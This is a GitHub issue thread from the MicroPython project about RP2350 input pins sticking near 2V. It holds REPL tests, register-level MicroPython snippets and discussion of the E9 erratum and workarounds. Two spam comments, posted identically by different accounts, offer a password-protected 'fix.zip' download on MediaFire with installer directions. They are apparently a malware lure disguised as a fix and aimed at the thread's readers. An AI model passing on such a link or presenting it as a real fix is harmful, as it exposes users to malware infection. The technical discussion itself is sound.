micropython/micropython #15718: RP2350: "stuck at 2V" input pin beahvior

dhalbert, 2024-08-26:
### Port, board and/or hardware

Pimoroni Tiny2350

### MicroPython version

Using build from https://github.com/pimoroni/pimoroni-pico-rp2350
https://github.com/pimoroni/pimoroni-pico-rp2350/releases/download/v0.0.5/tiny2350-v0.0.5-pimoroni-micropython.uf2

### Reproduction

I have been debugging what seems to be  [a problem](https://github.com/adafruit/circuitpython/issues/9541) in CircuitPython which seems related to the discussion here: https://github.com/orgs/micropython/discussions/15621#discussioncomment-10423602

It appears related to RP2350-E9 in the RP2350 datasheet, but am seeing even stranger behavior that seems more pervasive than RP2350-E9. The "stuck high" behavior described in the erratum seems to be reproducible even without enabling the internal pulldown:

Testing on a Pimoroni Tiny 2350:
```py
>>> from machine import Pin
>>> gp0 = Pin(0, mode=Pin.IN, pull=None)
>>> gp0.value()  # initial value of unconnected pin
0
>>> gp0.value()  # attach 1M resistor from pin to 3.3V
1
>>> gp0.value()  # remove resistor
1
>>> gp0.value()  # jumper pin to ground with 1M resistor
1
```
A voltmeter on the pin shows a stable 2.3V even after many seconds. The pin appears to be latched to 2.3V, as the erratum describes. Jumpering the pin hard (0 ohms)  to ground and then removing the jumper restores the quiescent pin voltage to 0v and `gp0.value()` again shows `0`.

I first saw this behavior in CircuitPython and reproduced it in MicroPython as well.

I don't see similar "stuck" behavior on RP2040.

One consideration: the hard-reset state of the pin has the pull-down set. But I have been modifying the CircuitPython code to clear the pull-downs before the pin is set up for input, and that did not help.

I opened an issue with raspberrypi: https://github.com/raspberrypi/pico-feedback/issues/401

### Expected behaviour

see above

### Observed behaviour

see above

### Additional Information

No, I've provided everything above.

### Code of Conduct

Yes, I agree

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

peterhinch, 2024-08-26:
See errata 9 in the datasheet and [this discussion post](https://github.com/orgs/micropython/discussions/15621#discussioncomment-10423602)

Gadgetoid, 2024-08-26:
I, too, found behaviour not sufficiently explained by the errata as currently documented and reported it via launch partner channels three weeks ago. For posterity the report was as follows:

We have the following circuit, connected to GP45:

[image]

When the button is pushed, it should connect GP45 to GND through 2x10k Ohm resistors and my best efforts at testing probing and poking suggest that it does.

However we are unable to see a low logic value on this pin unless we disable schmitt trigger and enable the pull-down.

I have been verifying this in MicroPython using:

```
import machine
import time

"""
0 - Slew rate control. 1 = Fast, 0 = Slow
1 - Enable schmitt trigger
2 - Pull down enable
3 - Pull up enable
4:5 - Drive
6 - Input enable
7 - Output disable
8 - Pad isolation
"""
machine.mem32[0x400380b8] = 0b011010100

while True:
    print(machine.mem32[0xd0000008] & (1 << 13))
    time.sleep(0.5)

```

If either schmitt trigger is enabled, or the pull-down is not enabled then the input will just read high regardless of button state.

Firing up and reading the ADC on this pin confirms the voltages are somewhat within reason:

```
import machine
import time

machine.mem32[0x400a0000] &= ~(0b111 << 12)
machine.mem32[0x400a0000] |= 5 << 12
machine.mem32[0x400a0000] |= 0b1
machine.mem32[0x400a0000] |= 0b1000

while True:
    adc_val = machine.mem32[0x400a0004] / ((1 << 11) - 1) * 3.3
    print(f"adc result reg {adc_val:.02f}")
    time.sleep(0.5)
```

~3.3v when released, and 0.07v when the button is pressed.

AIUI when the button is pressed the pin should read low when configured as an input with no pull direction, but it does not.

Note: we saw the same issue in Pico SDK using C code, but it's easier to poke registers from MicroPython.

I'm a software monkey, not a hardware engineer, but we've used variations of this circuit before with no problems.

robert-hh, 2024-08-26:
With that circuit connecting USER_SW to GND will result in about 2,2V at R4 resp RCS. With an otherwise not configured GPIO pin as Input this will read as high, since it is > Vcc/2. According to the data sheet the Level for high reading is 2V - 3.3V. If you configure the input with a PULL_DOWN, this will be in parallel to the 20k and result in about 12k, dropping the level at RCS and R4 to about 1.8V.
So you should change your circuit to reduce the resistor values for USER_SW, like puttiing two of them parallel instead in series.

Gadgetoid, 2024-08-26:
> So you should change your circuit to reduce the resistor values for USER_SW, like puttiing two of them parallel instead in series.

Already on that.

RCS is boot chip select, though, not the IO pin. That’s located at USER_SW.

robert-hh, 2024-08-26:
OK. Then pushing the SW should set indeed the USER_SW level to GND. 

I had seen a different behavior at the RP2040, as reported in an earlier PT dicussion:
>Interestingly this "undefined" state after power.on seems to apply to all GPIO pins. It is a kind of constant current mode of ~60µA to GND. This is different to other MCUs which have the GPIO pins in High Z input mode after power on, and may be important for low power applications.

Maybe that applies here as well against Vcc.

dhalbert, 2024-08-26:
To be clear, this is an issue MicroPython and CircuitPython are going to have to work around. Opening this issue is a follow-on to https://github.com/orgs/micropython/discussions/15621#discussioncomment-10423602, as noted in the original post. I have also opened an issue with the Raspberry Pi folks: https://github.com/raspberrypi/pico-feedback/issues/401.

dhalbert, 2024-08-26:
> I, too, found behaviour not sufficiently explained by the errata as currently documented and reported it via launch partner channels three weeks ago.

@Gadgetoid I am glad to hear I'm not hallucinating about this being more pervasive than RSP2350-E9 indicates.

Gadgetoid, 2024-08-26:
> I am glad to hear I'm not hallucinating about this being more pervasive than RSP2350-E9 indicates.

@dhalbert believe me, so was I 😆 took me a day or two of solid testing and exploration before I dared even raise the issue. It's just... bizarre. It was, as best as I can tell, all but confirmed. I copied my original issue here in solidarity, but since I don't want to speak for RPi here I have neglected to include their response.

After all this prodding and poking and testing I'm still I'm not sure how it can be worked around? Our particular fudge doesn't seem generalisable. Anyway until we get some more clarity on what's going on we can only guess at what we're even working around 😭

ayjaym, 2024-09-01:
There is also anomalous ADC behaviour associated I suspect with this issue. Configuring an adc input to high impedance by setting ISO and resetting EI in the GPIO register for that pin, eg GPIO 27, and then calling ADC(27) and then reading the ADC causes the pin to transition to Vdd for approx 2us each time the constructor is called but only for a certain range of input voltages. With a 5k pot across ground and 3.3V connecting the wiper via a 47K resistor will show an anomalous voltage drop across the resistor for input values around the logic 1 transition point. I've posted more details on the rpi forum but the 2040 doesn't have this issue and it screws up a resistive touchscreen interface where the gpios have to be dynamically configured to read x and y.

dhalbert, 2024-09-10:
May be of interest to the MicroPython folks:

Earlier this week we CircuitPython folks discussed internally what to do about the E9 workaround.

Without adding additional API specifically to support the RP2350, there is no way to inform CircuitPython in various use cases, "well, yes, this is a weak input signal, so do the workaround". The only hint would be if you enabled the internal pulldown, but there are other cases as well. We do not right now want to make a special-case API for the RP2350.

So our conclusion is to not implement the workaround, at least for now, but simply to document the restrictions that make it unnecessary: don't expect the internal pulldown to work, use an external pulldown 8.2k or lower if you need a pulldown, or make sure your input signal can sink enough current to override the leakage current. This is defining the problem away.

So this now becomes an issue for us to address via documentation.

ayjaym, 2024-09-10:
I would probably document how to set a pin to true high impedance mode using direct gpio access as I discussed elsewhere, as this at least lets designers transition an output pin to a true tristate output, whereas setting it to an input pin without pull-ups exposes anomalous impedance behaviour for certain voltages.